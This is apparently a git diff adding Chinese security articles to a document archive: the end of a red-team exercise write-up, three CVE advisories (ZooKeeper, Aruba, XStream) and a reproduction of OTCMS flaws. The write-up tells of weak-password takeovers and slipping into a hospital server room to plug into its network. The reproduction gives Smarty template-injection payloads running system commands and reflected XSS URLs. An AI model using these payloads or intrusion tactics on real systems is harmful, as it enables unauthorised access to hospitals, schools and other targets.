+![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcogThujOx2cAicLiahUClttzWPB0ltorVp9HIiaGQx4ZiaibWiah58ZZDduJmfoJyUIOHP9C0znWIgd0nGQ/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") +像这种物联网的客户端有好多,盲猜应该是一些投影仪之类的设备吧,基本都是弱口令,还扫到了其他一些设备,时间太久忘记了。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcogThujOx2cAicLiahUClttzW0Ihmc5YObhnicRNNJNWmUm7BRWqVXqEsIhJibRib4WBG0gf7tJrqw1SFw/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") +## 2.XX官网 + +这个就多亏了我的好兄弟给的一个day,直接进去任子行的防火墙,然后就是搭建vpn,进入内网,扫内网,用弱口令拿到一台交换机和另外几个设备。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcogThujOx2cAicLiahUClttzWdrSc60icb1Lea8QVKXHSeiaIP7CxVZF5ZoSwibzpmheBNAeqcicyE9Iocg/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcogThujOx2cAicLiahUClttzWnRuGFowEPt2KibvdVJnOYfge7BWy1gYCfpAicMdDN8yka6bUyjgcxlog/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcogThujOx2cAicLiahUClttzWHS2Q0iaBgd4EUFk5L2VSZbuL7fcDeDwH1bllNknBbSGmcPe3zG5GN9Q/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcogThujOx2cAicLiahUClttzWJbWFeUZpv9GTRCJ7iac4Qu0weyKthb33MM5efUXPibohoB3TMickoVFicA/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") +## 3.XX医院 + +这家医院看了一眼资产没有被打穿,就打车过去瞅瞅,冬天的医院可谓是满满当当的,问前台有wifi吗?想连一下打个游戏,就直接被拒绝了,呵操。然后开始一层一层的找有没有施工队未完成的地方,或者露出个什么断的网线,我直接免费给你安装一个水晶头,终于在住院部的顶层我发现了一个小机房,上面虽然写着机房重地,非请勿入,但是我可是来帮助你们发现薄弱点的,进去之后拿出自己随身携带的网线,插上路由器,开始扫内网,这次比上次好,两百多的ip,扫了快二十分钟,就是机房环境不太好,没有凳子,只能半蹲着,又因为网线太短,还得凑着电脑,搞得我是十分痛苦,但是结果还是挺满意,因为本人太菜,又因为对医院系统不熟悉,所以没能全部拿下来,只拿下来了一部分设备和系统。打算背着包出去的时候,在门上听了半天没什么动静了才出去,但是刚出去发现周围一堆人在往这边走刚好遇到我从机房出来,后面才发现旁边就是医院的员工宿舍,然后他们也不问,我也不说话,背着包快步走掉了,差点被逮到,逮到就要请去喝茶了。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcogThujOx2cAicLiahUClttzWV8llt9Uw9kUL4umh52y099QqibIwvcem1cNC0xRckC0hA76RAhfgyeQ/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcogThujOx2cAicLiahUClttzWMK4vWh0lvicZCibhI0AgrSPlnIyZ51jUePkrITBpdFEH5SKKSBuX2eng/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcogThujOx2cAicLiahUClttzWhkf1z3x74Iib9qLzKm3VvvD83b66yQna5oiaMMn506ibfficvVgtWgt1wQ/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") +## 4.XX中学 + +这个学校因为其中一个网站关闭,所以就口述一下渗透思路,当时发现这个学校有两个管理平台,一个是智慧校园,一个是校园平台,两个平台都需要进行登录,试了下常用漏洞都攻击不进去的时候,发现忘记密码地方显示的是,请联系某某老师,然后就是手机号,利用这个手机号,弱口令,发现这个平台进不去,就换了一个平台,还是这个手机号,弱口令,没想到就进去了,只恨这个学校是个中学老师太少,分数没加多少。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcogThujOx2cAicLiahUClttzWAdpI7xmjCqp8QekdiaJ9AO8nBCTI2Wgytt8Qu1Yib9DL8Unf7EVPtTiaA/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +``` +``` + + diff --git a/doc/漏洞预警 | Apache ZooKeeper身份验证绕过漏洞.md b/doc/漏洞预警 | Apache ZooKeeper身份验证绕过漏洞.md new file mode 100644 index 00000000..b34b1b72 --- /dev/null +++ b/doc/漏洞预警 | Apache ZooKeeper身份验证绕过漏洞.md @@ -0,0 +1,46 @@ +# 漏洞预警 | Apache ZooKeeper身份验证绕过漏洞 +浅安 浅安安全 2024-11-16 00:01 + +**0x00 漏洞编号** +- # CVE-2024-51504 + +**0x01 危险等级** +- 高危 + +**0x02 漏洞概述** + +Apache ZooKeeper是由集群使用的一种服务,用于在自身之间协调,并通过稳健的同步技术维护共享数据。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/7stTqD182SWJkBhlicYtEdFMCXic0K33Fvia5DAYx9VtxSA42pkdl6wu4QQCvF1p0uSlCP6v7LL9tvkYfjZh5BoRA/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +**0x03 漏洞详情** +### +### + +**CVE-2024-51504** + +**漏洞类型:** +身份验证绕过 + +**影响:** +获取 +敏感信息 + +**简述:** +Apache ZooKeeper存在身份验证绕过漏洞,当ZooKeeper Admin Server使用基于IP的身份验证时,由于默认配置下使用了可被轻易伪造的HTTP请求头来检测客户端IP地址,攻击者可通过伪造请求头中的IP地址来绕过身份验证,进而实现未授权访问管理服务器功能并任意执行管理服务器命令,从而可能导致信息泄露或服务可用性问题。 +### + +**0x04 影响版本** +- 3.9.0 <= Apache ZooKeeper < 3.9.3 + +**0x05****POC状态** +- 未公开 + +**0x06****修复建议** + +******目前官方已发布漏洞修复版本,建议用户升级到安全版本****:****** + +https://zookeeper.apache.org/ + + + diff --git a/doc/漏洞预警 | HPE Aruba Networking Access Points命令注入漏洞.md b/doc/漏洞预警 | HPE Aruba Networking Access Points命令注入漏洞.md new file mode 100644 index 00000000..12be76c0 --- /dev/null +++ b/doc/漏洞预警 | HPE Aruba Networking Access Points命令注入漏洞.md @@ -0,0 +1,49 @@ +# 漏洞预警 | HPE Aruba Networking Access Points命令注入漏洞 +浅安 浅安安全 2024-11-16 00:01 + +**0x00 漏洞编号** +- # CVE-2024-42509 + +**0x01 危险等级** +- 高危 + +**0x02 漏洞概述** + +HPE Aruba Networking Access Points是HPE旗下的Aruba Networking推出的一系列高性能无线接入点产品,旨在为企业提供稳定、高效、安全的无线网络连接,被广泛应用于企业、教育、商业等各种场景。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/7stTqD182SWpsmBToJ1PmvpWYLUqE5SKz2VpYvZKCBWZTYuxqkuZY3766tMibict8WacvbYoOCibO8QYTUvhMQgpw/640?wx_fmt=png&from=appmsg "") + +**0x03 漏洞详情** +### +### + +**CVE-2024-42509** + +**漏洞类型:** +命令注入 + +**影响:** +执行任意命令 + +**简述:** +由于HPE Aruba Networking Access Points底层CLI服务中存在命令注入漏洞,可能导致未经身份验证的威胁者通过向PAPI UDP端口发送特制数据包导致远程命令执行,成功利用该漏洞可能导致在底层操作系统上以特权用户身份执行任意命令或代码。 +### + +**0x04 影响版本** +- AOS-10.4.x.x <= 10.4.1.4 + +- Instant AOS-8.12.x.x <= 8.12.0.2 + +- Instant AOS-8.10.x.x <= 8.10.0.13 + +**0x05****POC状态** +- 未公开 + +**0x06****修复建议** + +**目前官方已发布漏洞修复版本,建议用户升级到安全版本****:** + +https://www.hpe.com/ + + + diff --git a/doc/漏洞预警 | XStream栈溢出漏洞.md b/doc/漏洞预警 | XStream栈溢出漏洞.md new file mode 100644 index 00000000..c1982e44 --- /dev/null +++ b/doc/漏洞预警 | XStream栈溢出漏洞.md @@ -0,0 +1,44 @@ +# 漏洞预警 | XStream栈溢出漏洞 +浅安 浅安安全 2024-11-16 00:01 + +**0x00 漏洞编号** +- CVE-2024-47072 + +**0x01 危险等级** +- 高危 + +**0x02 漏洞概述** + +XStream是一个用于在Java对象和XML之间相互转换的工具,它能够将Java对象序列化为XML或JSON格式,也可以将XML或JSON格式的数据反序列化为Java对象,从而简化了数据的存储、传输和恢复。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/7stTqD182SWpsmBToJ1PmvpWYLUqE5SKR3Ce50wCJImsymoz7GSVlS2psLAvUzlIiaG7QS43dNib3ccr7RUyicfpQ/640?wx_fmt=png&from=appmsg "") + +**0x03 漏洞详情** +### +### + +**CVE-2024-47072** + +**漏洞类型:** +栈溢出 + +**影响:** +服务中断 + +**简述:** +XStream 1.4.21之前版本中,当XStream配置为使用BinaryStreamDriver时,由于在反序列化某些特定输入时处理不当,攻击者可以通过构造特定的二进制数据流作为输入,导致在反序列化时进入无限递归,从而触发栈溢出,使应用程序崩溃并导致服务中断,造成拒绝服务。 + +**0x04 影响版本** +- XStream < 1.4.21 + +**0x05****POC状态** +- 未公开 + +**0x06****修复建议** + +******目前官方已发布漏洞修复版本,建议用户升级到安全版本****:****** + +https://x-stream.github.io/ + + + diff --git a/doc/网太CMS漏洞复现.md b/doc/网太CMS漏洞复现.md new file mode 100644 index 00000000..6018de78 --- /dev/null +++ b/doc/网太CMS漏洞复现.md @@ -0,0 +1,161 @@ +# 网太CMS漏洞复现 + 进击的HACK 2024-11-15 23:55 + +# 版本:OTCMS_PHP_V7.16 + +搭建:http://m.otcms.com/news/8388.html +## 漏洞1:SSTI + +**理解SSTI:**SSTI(服务器端模板注入),SSTI和SQL注入原理差不多,都是因为对输入的字符串控制不足,把输入的字符串当成命令执行。 + +**造成漏洞的主要成因:**render_template渲染函数在渲染的时候,对用户输入的变量不做渲染。 + +**理解render_template渲染函数:**把HTML涉及的页面与用户数据分离开,这样方便展示和管理。当用户输入自己的数据信息,HTML页面可以根据用户自身的信息来展示页面。 + +**SSTI漏洞原理:**服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题. + +**注意:**这种模板不只存在于 Python 中,凡是使用模板的地方都可能会出现SSTI 的问题,SSTI 不属于任何一种语言,沙盒绕过也不是 + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtw1naSZia2Sf3y1XZNuiaTr1GaM857YOJqiaov4HZDlCK9ffVV7pf0gceJw/640?wx_fmt=png&from=appmsg "") + +**常见的模版** + +**php** + +
Smarty很老的PHP模板引擎了,非常的经典,使用的比较广泛
Twig来自于Symfony的模板引擎,易于安装和使用
BladeLaravel 提供的一个既简单又强大的模板引擎
+ +**Java** + +
JSP经典
FreeMarker一种基于模板和要改变的数据,并用来生成输出文本。一个Java类库,是一款程序员可以嵌入他们所开发产品的组件
Velocity不仅可以替代JSP作为JavaWeb的服务端网页模板引擎,还可以作为普通文本的模板引擎来增强服务端程序文本处理能力
+ +**python** + +
Jinja2广泛
django使用别的就不能发挥出 django 的特性了django 以快速开发著称,但
tornadotornado 强调的是异步非阻塞高并发
+### 漏洞分析 + +功能点进行代码审计 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwiaiapto4K6VheA05PAnKN85kf6zzQEOjQia4VsoM3JPdh0C9a6iaSKoQibA/640?wx_fmt=png&from=appmsg "") + + +抓包: + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtw1naSZia2Sf3y1XZNuiaTr1GaM857YOJqiaov4HZDlCK9ffVV7pf0gceJw/640?wx_fmt=png&from=appmsg "") + + +打码审计 + +添加、修改文件处对函数$fileContent没有进行SSTI漏洞限制,主要是对{{}}没有进行过滤 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwDNxI51yUxNfcqZWBj1rnJRFedpP9a6NAAIMBzpXzW1RHztQibtMIxmg/640?wx_fmt=png&from=appmsg "") + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwiatGvQC0BbSjOaTeoRmDsZn8HuWMw9IRRAIqQgAUpG7QhMKmZrzoCsg/640?wx_fmt=png&from=appmsg "") + +### 漏洞复现 + +验证是否存在SSTI漏洞 + +1、查看使用模版引擎是Smarty + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwvXmwcSv4iajkFqyhQXDdo27WNUibQBYY3qx3tVXJ7iaicXYY7vqASSv9Hw/640?wx_fmt=png&from=appmsg "") + + +2、登录后台 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwO6Zl4Kvrq9aOJk7GZx0xoI2ZJM7AErx9JV0xKJxXORrgBhsd2xU0icQ/640?wx_fmt=png&from=appmsg "") + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwpxfCNoR7JJ74ZmoxiaOeVcib41ZOHLCG4VAHVL0WIxAkUb6SEpde3gJg/640?wx_fmt=png&from=appmsg "") + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwGzibVzqJxybhoXuIj83j01tEkcsZuYfyrrxjagialwMJ8Xg8dz8Jzg2Q/640?wx_fmt=png&from=appmsg "") + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwHafoQshULM5lbfZicNurc2YIfkg1sSb2SKejzuEyfHu8Mn691wrIBicA/640?wx_fmt=png&from=appmsg "") + + +修改内容为 +``` +{otcms:1*2} + +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwDHeKl5xKy33wL8RK905q8S1LnTDjladqlqwT4amECiaXfHPKgLQuRKw/640?wx_fmt=png&from=appmsg "") + + +注入的表达式已经执行 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwgu5tOfBFWSBgnTwGr3ictLUaGcsY6vySpSV0icPL2TRY5ACibdG031Viaw/640?wx_fmt=png&from=appmsg "") + + +查看Smarty的版本 +``` +{otcms:version} + +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwZL2fbmSFz8dzOtJnIbwakNucwbmm3TX3GCVW5oIR0H6V9vk2KmCZ0w/640?wx_fmt=png&from=appmsg "") + + +**注入poc** + +**详见:CVE-2021-26119** +``` +{otcms:$smarty.template_object->smarty->_getSmartyObj()->display('string:{otcms:system(calc)}')} + +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwQqvZEficLibUa2pFliax1JO110BCZoRiaibp6EMZoibH8ichAJMd120IncHicA/640?wx_fmt=png&from=appmsg "") + + +**常见poc** +``` +string:{$smarty.template_object->smarty->enableSecurity()->display('string:{system(whoami)}')} +string:{$smarty.template_object->smarty->disableSecurity()->display('string:{system(whoami)}')} +string:{$smarty.template_object->smarty->addTemplateDir('./x')->display('string:{system(whoami)}')} +string:{$smarty.template_object->smarty->setTemplateDir('./x')->display('string:{system(whoami)}')} +string:{$smarty.template_object->smarty->addPluginsDir('./x')->display('string:{system(whoami)}')} +string:{$smarty.template_object->smarty->setPluginsDir('./x')->display('string:{system(whoami)}')} +string:{$smarty.template_object->smarty->setCompileDir('./x')->display('string:{system(whoami)}')} +string:{$smarty.template_object->smarty->setCacheDir('./x')->display('string:{system(whoami)}')} + +``` +## 漏洞二 :xss漏洞 +### 在apiRun.php接口处存在xss漏洞 + +定义变量 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwWArF71Dy3olhtd9UJvqc357cajAg5pllGaw9JahbpeDAAlTiafTjmTA/640?wx_fmt=png&from=appmsg "") + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwKKTw7v3TmOuScWZuDuKGF9QJ6pKYxLZdfuuWtyZLAvaFMgRx3FHFDA/640?wx_fmt=png&from=appmsg "") + + +**注入poc** +``` +apiRun.php?mode=";alert(1);//&mudi=autoRun +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwZIrOvHnfmMU5gEwlmUEqUVcIyBhYen9toibSfGRmFNKYVlcjNnq6zVw/640?wx_fmt=png&from=appmsg "") + +### 在inc\classAreaApp.php存在xss漏洞 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwd548OzXFJYfXyUnSISdzKKlcrBibmODzWIONxpTibSovaGffeX9ojyBQ/640?wx_fmt=png&from=appmsg "") + + +**注入POC** +``` +http://www.otcms.com/wap/users/p.php?m=sendPhoneForm&dataID=7866&theme=1%22&_=1706170896361&type=%22%3E%3Cscript%3Ealert(1);%3C/script%3E + +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwJ1koyWhrBoLfEruIZpGk3azegdcXBFmbM1XAYh5E31XWgUmhfJ0BXA/640?wx_fmt=png&from=appmsg "") + + +参考文章: + +https://xz.aliyun.com/t/13432?time__1311=Gqmxu7G%3DH4lx0nD2DU2YoGC3D8Qn5fox#toc-7 + +https://xz.aliyun.com/t/11108?time__1311=mqmx0DyDcDuGqq0vo4%2BxOD9WuKqDvN%2BQex&alichlgref=https%3A%2F%2Fxz.aliyun.com%2Fu%2F39303#toc-6 + +